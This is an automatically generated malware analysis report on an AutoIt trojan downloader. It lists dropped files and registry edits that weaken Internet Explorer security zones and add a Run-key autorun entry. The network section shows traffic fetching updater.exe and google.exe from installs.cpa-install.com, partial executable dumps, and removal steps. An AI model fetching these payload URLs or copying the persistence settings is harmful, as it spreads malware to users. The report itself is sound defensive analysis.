Trojan.Win32.Agent.aiees (Kaspersky), Trojan.GenericKD.1874816 (AdAware), Worm.Win32.AutoIt.FD, mzpefinder_pcap_file.YR, WormAutoItGen.YR (Lavasoft MAS)Behaviour: Trojan, Worm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 257e0dfad8ebd0db9ff57f0a3421ba3a
SHA1: 0642fbaef019f924842a2d9d6dd8c07388f60305
SHA256: a777e768feea137b32f9be1bf7556f7de9d4b816a42e35f600186f19963fb162
SSDeep: 24576:wtb20pkaCqT5TBWgNQ7aGKbf U7Y9cVTg1IytSXheX9TmE2aYDwskuZrSKVps6A:5Vg5tQ7aGG709AyYXhYdwjwskuZE5
Size: 1811968 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AppsInstaller
Created at: 2014-10-27 17:49:40
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1600
Setup.exe:1688
doc.exe:640
Index.exe:1204
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Setup.exe (8801 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (4161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5737 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (0 bytes)
The process doc.exe:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@menaon[1].txt (212 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (388 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@somdows[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\3.92826783796772.txt (371 bytes)
The process Index.exe:1204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\5[1].txt (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528\1.90694312099367.txt (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cpa-install[1].txt (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\one.exe (117004 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\doc.exe (117724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\updater[1].exe (443897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\google[1].exe (445697 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528\1.90694312099367.txt (0 bytes)
Registry activity
The process %original file name%.exe:1600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 6A 7B AD 4B 84 F4 D1 8B 51 8D 37 D4 A6 E3 C5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_Games_pl" = "5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"setup.exe" = "InstallScript Setup Launcher Unicode"
"Index.exe" = "Index"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process Setup.exe:1688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 AC 55 F6 F2 8F 8A 66 53 69 1B 85 BB 9B 2E B3"
The process doc.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_GamesID" = "181019"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 A6 62 EF CC CA 58 D3 C1 12 CA A5 7B B3 9B FF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Index.exe:1204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 72 DE AA A7 F2 D6 F1 84 E2 F3 62 5E EC 85 A1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\one.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
cc117b3f01592e8160fe02e77f43bd4f | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Google\int\doc.exe |
7a3e44250c9a3f18feb54c6f5caec419 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Google\int\one.exe |
6620e41cc69bd82820b2b7ab1924ee9a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Index.exe |
26484349338b15066badb0d2f724693e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Setup.exe |
cc117b3f01592e8160fe02e77f43bd4f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\google[1].exe |
7a3e44250c9a3f18feb54c6f5caec419 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\updater[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1600
Setup.exe:1688
doc.exe:640
Index.exe:1204 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\Setup.exe (8801 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (4161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5737 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@menaon[1].txt (212 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (388 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@somdows[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\3.92826783796772.txt (371 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\5[1].txt (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528\1.90694312099367.txt (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cpa-install[1].txt (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\one.exe (117004 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\doc.exe (117724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\updater[1].exe (443897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\google[1].exe (445697 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\one.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 570703 | 570880 | 4.63051 | f437a6545e938612764dbb0a314376fc |
.rdata | 577536 | 183362 | 183808 | 3.99959 | 827ffd24759e8e420890ecf164be989e |
.data | 761856 | 40276 | 25088 | 1.38816 | e0a519f8e3a35fae0d9c2cfd5a4bacfc |
.rsrc | 802816 | 988172 | 988672 | 5.53 | 187d795f3be92ab1d7790233fa059ce7 |
.reloc | 1794048 | 42100 | 42496 | 3.63585 | 0bc98f8631ef0bde830a7f83bb06ff08 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://installs.cpa-install.com/ClientFiles/get/5 | 104.28.5.102 |
hxxp://installs.cpa-install.com/update/client_1/updater.exe | 104.28.5.102 |
hxxp://installs.cpa-install.com/update/client_1/google.exe | 104.28.5.102 |
hxxp://www1.somdows.com/computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214290322156/XP1/5.1/0&com=a&pl=5&prog_installs= | 104.28.20.61 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /ClientFiles/get/5 HTTP/1.1
User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 06:52:46 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 232
Connection: keep-alive
Set-Cookie: __cfduid=d756b152af0af3b7980b30079183458671419058366; expires=Sun, 20-Dec-15 06:52:46 GMT; path=/; domain=.cpa-install.com; HttpOnly
X-Powered-By: PHP/5.4.34
X-Frame-Options: ALLOWALL
Server: cloudflare-nginx
CF-RAY: 19b9eb48752206a3-EWR
hXXp://installs.cpa-install.com/update/client_1/updater.exe$one.exe$@AppDataDir$\Google\int$HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run$Microsoft.hXXp://installs.cpa-install.com/update/client_1/google.exe$doc.exe....
GET /update/client_1/updater.exe HTTP/1.1
User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache
Cookie: __cfduid=d756b152af0af3b7980b30079183458671419058366
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 06:52:47 GMT
Content-Type: application/x-msdownload
Content-Length: 908800
Connection: keep-alive
Last-Modified: Fri, 19 Dec 2014 17:25:16 GMT
Accept-Ranges: bytes
X-Frame-Options: ALLOWALL
Server: cloudflare-nginx
CF-RAY: 19b9eb4aa56c06a3-EWR
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich....................PE..L...0^.T.........."..........$......t_............@..........................@......|&....@...@.......@......................p..|....@...M......................Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc....M...@...N..................@..@.reloc..t............8..............@..B........................................................................................................................................................................................................................................................................................................................U..V...6.......u&.E..0j.j..6..p.H...t..}..........^]...2...U..Q.E.Ph....j.3.PPP.u...X.H...........U....4SV.u.W.F....@.3..].j....E..]....M......Q..j.X.E.......E..H....E..A..E..A..E..A..E....M....E..A..E..A..E..A..E....E...t.....M..E..J....E...uU.E.P............P...~....wD.N.P...E.P.h...P......u..........3.@.F..>.M......_^..[.....M.........F..H........U.......D.d$..SV.u.W.F..L$..8j....^..........S..j.[......O....D$$.A..D$(.A..D$,.A..D$0...L$$...D$..A..D$..A..D$..A..D$ .....t..L$$....M........0S...L$.......
<<< skipped >>>
GET /update/client_1/google.exe HTTP/1.1
User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache
Cookie: __cfduid=d756b152af0af3b7980b30079183458671419058366
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 06:53:04 GMT
Content-Type: application/x-msdownload
Content-Length: 913920
Connection: keep-alive
Last-Modified: Fri, 19 Dec 2014 17:25:16 GMT
Accept-Ranges: bytes
X-Frame-Options: ALLOWALL
Server: cloudflare-nginx
CF-RAY: 19b9ebb952e806a3-EWR
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich....................PE..L...#^.T.........."..........8......t_............@..........................`....... ....@...@.......@......................p..|....@...`......................Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc....`...@...b..................@..@.reloc..t............L..............@..B........................................................................................................................................................................................................................................................................................................................U..V...6.......u&.E..0j.j..6..p.H...t..}..........^]...2...U..Q.E.Ph....j.3.PPP.u...X.H...........U....4SV.u.W.F....@.3..].j....E..]....M......Q..j.X.E.......E..H....E..A..E..A..E..A..E....M....E..A..E..A..E..A..E....E...t.....M..E..J....E...uU.E.P............P...~....wD.N.P...E.P.h...P......u..........3.@.F..>.M......_^..[.....M.........F..H........U.......D.d$..SV.u.W.F..L$..8j....^..........S..j.[......O....D$$.A..D$(.A..D$,.A..D$0...L$$...D$..A..D$..A..D$..A..D$ .....t..L$$....M........0S...L$.......
<<< skipped >>>
GET /computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214290322156/XP1/5.1/0&com=a&pl=5&prog_installs= HTTP/1.1
User-Agent: AutoIt
Host: www1.somdows.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 06:53:49 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df6ea2ee355f5e3364ff5eabad83959bb1419058426; expires=Sun, 20-Dec-15 06:53:46 GMT; path=/; domain=.somdows.com; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.34
X-Frame-Options: ALLOWALL
Server: cloudflare-nginx
CF-RAY: 19b9ecbd73fb0773-EWR
173..181019.7$bdMin..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Setup.exe_1688:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t&SSh
t&SSh
}j%Xf;
}j%Xf;
SSSSh0u
SSSSh0u
PSSh@`G
PSSh@`G
CMDhX
CMDhX
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
%d@wd
%d@wd
uRegDeleteKeyTransactedW
uRegDeleteKeyTransactedW
setup.exe
setup.exe
.debug
.debug
.rdata
.rdata
setup.cpp
setup.cpp
ISSetup.dll
ISSetup.dll
setup.inx
setup.inx
layout.bin
layout.bin
Kernel32.dll
Kernel32.dll
InternetOpenUrlW
InternetOpenUrlW
InternetCrackUrlW
InternetCrackUrlW
InternetCreateUrlW
InternetCreateUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExW
HttpEndRequestW
HttpEndRequestW
InternetCanonicalizeUrlW
InternetCanonicalizeUrlW
FtpFindFirstFileA
FtpFindFirstFileA
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
skin.ini
skin.ini
-x
-x
RegOpenKeyTransactedW
RegOpenKeyTransactedW
COMCTL32.dll
COMCTL32.dll
VERSION.dll
VERSION.dll
LZ32.dll
LZ32.dll
msi.dll
msi.dll
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
CreateDialogIndirectParamW
CreateDialogIndirectParamW
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
RPCRT4.dll
RPCRT4.dll
gdiplus.dll
gdiplus.dll
GetCPInfo
GetCPInfo
ExitWindowsEx
ExitWindowsEx
EnumChildWindows
EnumChildWindows
SetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
RegOpenKeyW
RegOpenKeyW
RegEnumKeyW
RegEnumKeyW
.?AVhttp_file@is@@
.?AVhttp_file@is@@
zcÃ
zcÃ
.BFAM
.BFAM
.xbb6
.xbb6
W.oln
W.oln
sJ.um
sJ.um
11111118
11111118
222222222
222222222
7777@@@@
7777@@@@
2222222
2222222
222222222222
222222222222
22222222222
22222222222
2222222222
2222222222
''''~~~~
''''~~~~
777@7@@@
777@7@@@
--$$#!!!!
--$$#!!!!
7777777
7777777
111118111
111118111
22222222
22222222
FFFrCrTrTTTTTTTTTTTTTTTTTrTrTrrrrrrrFrrbFbbbFbbbbbbbbbbbbbbbbbooooooooooooooooo
FFFrCrTrTTTTTTTTTTTTTTTTTrTrTrrrrrrrFrrbFbbbFbbbbbbbbbbbbbbbbbooooooooooooooooo
!!##$$$$#
!!##$$$$#
.....zzbF
.....zzbF
...zzbFF)
...zzbFF)
0000000
0000000
11111111
11111111
1111111
1111111
|||:||||
|||:||||
,6,6,666
,6,6,666
))):||||
))):||||
2222222222222
2222222222222
222222222222222
222222222222222
):::||||
):::||||
;{;{;;3;
;{;{;;3;
{;{{;;{;
{;{{;;{;
6,66,,,,
6,66,,,,
6,,666,,,
6,,666,,,
>>>///>///>>>
>>>///>///>>>
,6,,6,,,
,6,,6,,,
>>/>//>/
>>/>//>/
>//>/>>>
>//>/>>>
///>>/>/>
///>>/>/>
#$)))'--'-..1/..1...,,. ', (& &(,&&(,&,&(&,& ',&,(,&,,, ,046782
#$)))'--'-..1/..1...,,. ', (& &(,&&(,&,&(&,& ',&,(,&,,, ,046782
#!#&))-&--1'... ,,,&&(,&&(& (,&'(,&'(&,&'&(&(&'&'&(&&',&,,0465
#!#&))-&--1'... ,,,&&(,&&(& (,&'(,&'(&,&'&(&(&'&'&(&&',&,,0465
$#!)))'&--'*. (,(,,(,&(,&'(,&&(&',&&'&,'&',&,&,& (,&,& (,&,& &.5.
$#!)))'&--'*. (,(,,(,&(,&'(,&&(&',&&'&,'&',&,&,& (,&,& (,&,& &.5.
#$!)))-)-*-,& & &'& (&&,&(',&&,&&',&'&,&(&'(&&(&&&'&(&(&(&'(,&,,
#$!)))-)-*-,& & &'& (&&,&(',&&,&&',&'&,&(&'(&&(&&&'&(&(&(&'(,&,,
